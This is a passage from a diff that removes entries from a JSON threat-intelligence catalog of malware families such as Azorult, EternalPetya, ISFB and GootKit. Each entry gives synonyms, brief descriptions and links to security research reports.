"https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" - ] - } - }, - { - "uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419", - "value": "POWRUNER", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" - ] - } - }, - { - "uuid": "7c6ed154-3232-4b7a-80c3-8052ce0c7333", - "value": "Netrepser", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://labs.bitdefender.com/2017/05/inside-netrepser-a-javascript-based-targeted-attack/" - ] - } - }, - { - "uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13", - "value": "DogHousePower", - "description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github.", - "meta": { - "synonyms": [ - "Shelma" - ], - "type": [], - "refs": [ - "http://www1.paladion.net/hubfs/Newsletter/DogHousePower-%20Newly%20Identified%20Python-Based%20Ransomware.pdf" - ] - } - }, - { - "uuid": "b39ffc73-db5f-4a8a-acd2-bee958d69155", - "value": "Pushdo", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf", - "http://malware-traffic-analysis.net/2017/04/03/index2.html", - "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/" - ] - } - }, - { - "uuid": "8611f656-b0d8-4d16-93f0-c699f2af9b7a", - "value": "Royal DNS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/nccgroup/Royal_APT", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" - ] - } - }, - { - "uuid": "6bd20349-1231-4aaa-ba2a-f4b09d3b344c", - "value": "Seduploader", - "description": "", - "meta": { - "synonyms": [ - "jhuhugit", - "jkeyskw", - "carberplike", - "downrage" - ], - "type": [], - "refs": [ - "https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/", - "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", - "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", - "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/", - "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/", - "https://blog.xpnsec.com/apt28-hospitality-malware-part-2/", - "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed" - ] - } - }, - { - "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d", - "value": "Lady", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://news.drweb.com/news/?i=10140&lng=en" - ] - } - }, - { - "uuid": "0dfbe48e-a3da-4265-975e-1eb37ad9c51c", - "value": "Azorult", - "description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.", - "meta": { - "synonyms": [ - "PuffStealer", - "Rultazo" - ], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", - "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", - "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", - "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", - "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers" - ] - } - }, - { - "uuid": "35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1", - "value": "HiKit", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.recordedfuture.com/hidden-lynx-analysis/", - "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" - ] - } - }, - { - "uuid": "7fdb91ea-52dc-499c-81f9-3dd824e2caa0", - "value": "Moose", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.welivesecurity.com/2015/05/26/moose-router-worm/", - "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/", - "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/" - ] - } - }, - { - "uuid": "1e722d81-085e-4beb-8901-aa27fe502dba", - "value": "Cannibal Rat", - "description": "Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html" - ] - } - }, - { - "uuid": "e8d1a1f3-3170-4562-9a18-cadf000e48d0", - "value": "htpRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.riskiq.com/blog/labs/htprat/" - ] - } - }, - { - "uuid": "c41e7fdd-f1b1-4b87-97d7-634202af8b61", - "value": "Orcus RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors", - "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", - "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/", - "https://orcustechnologies.com/" - ] - } - }, - { - "uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b", - "value": "Dvmap", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" - ] - } - }, - { - "uuid": "4f079a71-bb1b-47b6-a6d0-26a37cd8a3a6", - "value": "Syscon", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/" - ] - } - }, - { - "uuid": "5aed5403-9c52-4de6-9c8d-d29e5197ef7e", - "value": "Sarhust", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a" - ] - } - }, - { - "uuid": "13236f94-802b-4abc-aaa9-cb80cf4df9ed", - "value": "Zloader", - "description": "A banking trojan first observed in October 2016 has grown into a sophisticated hacking tool that works primarily as a banking trojan, but could also be used as an infostealer or backdoor.", - "meta": { - "synonyms": [ - "Zeus Terdot" - ], - "type": [], - "refs": [ - "https://labs.bitdefender.com/2017/11/terdot-zeus-based-malware-strikes-back-with-a-blast-from-the-past/", - "https://www.arbornetworks.com/blog/asert/great-dga-sphinx/", - "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/" - ] - } - }, - { - "uuid": "a936a595-f03d-4d8c-848e-2a3525c0415b", - "value": "Unidentified 023", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "dde61acb-8c0f-4a3a-8450-96e233f2ddc1", - "value": "mozart", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html" - ] - } - }, - { - "uuid": "52e0bcba-e352-4d7b-82ee-9169f18dca5a", - "value": "DeriaLock", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/struppigel/status/812601286088597505" - ] - } - }, - { - "uuid": "52d98d2f-db62-430d-8658-5cadaeff6cd7", - "value": "Korlia", - "description": "", - "meta": { - "synonyms": [ - "bisonal" - ], - "type": [], - "refs": [ - "https://securitykitten.github.io/2014/11/25/curious-korlia.html", - "https://camal.coseinc.com/publish/2013Bisonal.pdf" - ] - } - }, - { - "uuid": "e1600d04-d2f7-4862-8bbc-0f038ea683ea", - "value": "TeleRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" - ] - } - }, - { - "uuid": "f371c85c-56f6-4ddf-8502-81866da4965b", - "value": "Pitou", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884", - "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf" - ] - } - }, - { - "uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027", - "value": "KillDisk", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/" - ] - } - }, - { - "uuid": "686a9217-3978-47c0-9989-dd2a3438ba72", - "value": "Laziok", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector", - "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802" - ] - } - }, - { - "uuid": "35e00ff0-704e-4e61-b9bb-9ed20a4a008f", - "value": "BS2005", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/nccgroup/Royal_APT", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" - ] - } - }, - { - "uuid": "a13a2cb8-b0e6-483a-9916-f44969a2c42b", - "value": "Laoshu", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x16.html", - "https://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-mac-users-in-undelivered-courier-item-attack/" - ] - } - }, - { - "uuid": "6f736038-4f74-435b-8904-6870ee0e23ba", - "value": "EternalPetya", - "description": "", - "meta": { - "synonyms": [ - "NonPetya", - "Diskcoder.C", - "NotPetya", - "Petna", - "Nyetya", - "BadRabbit", - "nPetya", - "ExPetr", - "Pnyetya" - ], - "type": [], - "refs": [ - "http://blog.talosintelligence.com/2017/10/bad-rabbit.html", - "https://securelist.com/from-blackenergy-to-expetr/78937/", - "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html", - "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/", - "https://labsblog.f-secure.com/2017/06/30/eternal-petya-from-a-developers-perspective/", - "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b", - "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/", - "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/", - "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html", - "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/", - "http://www.intezer.com/notpetya-returns-bad-rabbit/", - "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik", - "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/", - "https://www.riskiq.com/blog/labs/badrabbit/", - "https://labsblog.f-secure.com/2017/06/29/petya-i-want-to-believe/", - "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", - "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/", - "https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/", - "https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/", - "https://securelist.com/schroedingers-petya/78870/", - "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", - "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", - "https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/", - "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/", - "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4", - "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", - "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer", - "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/", - "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/", - "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html", - "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html", - "https://securelist.com/bad-rabbit-ransomware/82851/" - ] - } - }, - { - "uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591", - "value": "DarkComet", - "description": "", - "meta": { - "synonyms": [ - "Fynloski", - "klovbot" - ], - "type": [], - "refs": [ - "https://darkcomet.net", - "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/", - "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", - "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/" - ] - } - }, - { - "uuid": "a171321e-4968-4ac0-8497-3250c1f0d77d", - "value": "ISFB", - "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information.", - "meta": { - "synonyms": [ - "Gozi ISFB", - "IAP", - "Pandemyia" - ], - "type": [], - "refs": [ - "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", - "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", - "https://lokalhost.pl/gozi_tree.txt", - "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", - "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245", - "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", - "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html", - "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", - "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", - "https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based", - "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html" - ] - } - }, - { - "uuid": "ad960c5c-f2a1-405e-a32a-31f75b7c6859", - "value": "CMSBrute", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/the-shade-encryptor-a-double-threat/72087/" - ] - } - }, - { - "uuid": "54c8a055-a4be-4ec0-9943-ecad929e0dac", - "value": "Listrix", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] - } - }, - { - "uuid": "4c786624-4a55-46e6-849d-b65552034235", - "value": "Miuref", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "3e47c926-eea3-4fba-915a-1f3c5b92a94c", - "value": "Ransomlock", - "description": "", - "meta": { - "synonyms": [ - "WinLock" - ], - "type": [], - "refs": [ - "https://forum.malekal.com/viewtopic.php?t=36485&start=", - "https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2" - ] - } - }, - { - "uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154", - "value": "pirpi", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" - ] - } - }, - { - "uuid": "4cb8235a-7e70-4fad-9244-69215750d559", - "value": "Unidentified 045", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "77f2254c-9886-4eed-a7c3-bbcef4a97d46", - "value": "WireX", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/", - "https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/" - ] - } - }, - { - "uuid": "1f4d8d42-8f31-47f8-b2b7-2d43196de532", - "value": "Slave", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cert.pl/en/news/single/slave-banatrix-and-ransomware/" - ] - } - }, - { - "uuid": "93b27a50-f9b7-4ab6-bb9f-70a4b914eec3", - "value": "TinyZ", - "description": "", - "meta": { - "synonyms": [ - "Catelites Android Bot", - "MarsElite Android Bot" - ], - "type": [], - "refs": [ - "http://blog.group-ib.com/cron" - ] - } - }, - { - "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1", - "value": "RGDoor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/" - ] - } - }, - { - "uuid": "7f550cae-98b7-4a0c-bed2-d79227dc6310", - "value": "Citadel", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.xylibox.com/2016/02/citadel-0011-atmos.html", - "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html", - "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/", - "https://www.arbornetworks.com/blog/asert/the-citadel-and-gameover-campaigns-of-5cb682c10440b2ebaf9f28c1fe438468/" - ] - } - }, - { - "uuid": "9a3d71b1-ce2f-4506-85c1-ec661b8f4032", - "value": "DualToy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" - ] - } - }, - { - "uuid": "192f93bc-fcf6-4aaf-ae2f-d9435a67e48b", - "value": "Magala", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/" - ] - } - }, - { - "uuid": "53089817-6d65-4802-a7d2-5ccc3d919b74", - "value": "X-Tunnel", - "description": "", - "meta": { - "synonyms": [ - "xaps" - ], - "type": [], - "refs": [ - "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", - "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf", - "https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf", - "https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf" - ] - } - }, - { - "uuid": "30d49b12-0dca-4652-9f7a-4d0cf7555375", - "value": "OvidiyStealer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/meet-ovidiy-stealer-bringing-credential-theft-masses" - ] - } - }, - { - "uuid": "48deadcc-1a67-442d-b181-fdaaa337c4bb", - "value": "Trump Ransom", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "34e9d701-22a1-4315-891d-443edd077abf", - "value": "SpyBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "77e85a95-6a78-4255-915a-488eb73ee82f", - "value": "CockBlocker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/JaromirHorejsi/status/817311664391524352" - ] - } - }, - { - "uuid": "b7240444-94a6-4d57-a6b3-ca38182eff7a", - "value": "Cryptorium", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/struppigel/status/810770490491043840" - ] - } - }, - { - "uuid": "c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70", - "value": "Ayegent", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "5b3af4f0-7502-4125-bf63-b393cf185a52", - "value": "FlexiSpy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" - ] - } - }, - { - "uuid": "43a56ed7-8092-4b36-998c-349b02b3bd0d", - "value": "PLEAD", - "description": "", - "meta": { - "synonyms": [ - "TSCookie" - ], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/", - "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html", - "http://www.freebuf.com/column/159865.html", - "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html", - "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf" - ] - } - }, - { - "uuid": "cf752563-ad8a-4286-b2b3-9acf24a0a09a", - "value": "Sality", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf" - ] - } - }, - { - "uuid": "329efac7-922e-4d8b-90a9-4a87c3281753", - "value": "GootKit", - "description": "Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++-library functions for various tasks.", - "meta": { - "synonyms": [ - "Xswkit" - ], - "type": [], - "refs": [ - "https://www.lexsi.com/securityhub/homer-simpson-brian-krebs-rencontrent-zeus-gootkit/", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669", - "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/", - "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", - "https://www.us-cert.gov/ncas/alerts/TA16-336A", - "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/", - "https://www.youtube.com/watch?v=242Tn0IL2jE", - "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html", - "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", - "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html", - "https://news.drweb.com/show/?i=4338&lng=en", - "https://www.cyphort.com/angler-ek-leads-to-fileless-gootkit/", - "https://www.youtube.com/watch?v=QgUlPvEE4aw", - "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055" - ] - } - }, - { - "uuid": "294bb6f0-0610-47e6-a4e7-71e40cf69908", - "value": "Cpuminer", - "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/pooler/cpuminer" - ] - } - }, - { - "uuid": "a85b0619-ed8e-4324-8603-af211d682dac", - "value": "Ripper ATM", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/" - ] - } - }, - { - "uuid": "d1f8af3c-719b-4f64-961b-8d89a2defa02", - "value": "MacInstaller", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x16.html" - ] - } - }, - { - "uuid": "700366d8-4036-4e48-9a5f-bd6e09fb9b6b", - "value": "Chapro", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", - "http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a" - ] - } - }, - { - "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e", - "value": "Cardinal RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412" - ] - } - }, - { - "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5", - "value": "BrickerBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/", - "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/", - "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/", - "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f", - "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A", - "http://seclists.org/fulldisclosure/2017/Mar/7" - ] - } - }, - { - "uuid": "54cd671e-b7e4-4dd3-9bfa-dc0ba5105944", - "value": "ManameCrypt", - "description": "", - "meta": { - "synonyms": [ - "CryptoHost" - ], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/", - "https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route" - ] - } - }, - { - "uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e", - "value": "Switcher", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/" - ] - } - }, - { - "uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d", - "value": "Dummy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x32.html" - ] - } - }, - { - "uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2", - "value": "Unidentified 047", - "description": "RAT written in Delphi used by Patchwork APT.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" - ] - } - }, - { - "uuid": "53616ce4-9b8e-45a0-b380-9e778cd95ae2", - "value": "Infy", - "description": "", - "meta": { - "synonyms": [ - "Foudre" - ], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", - 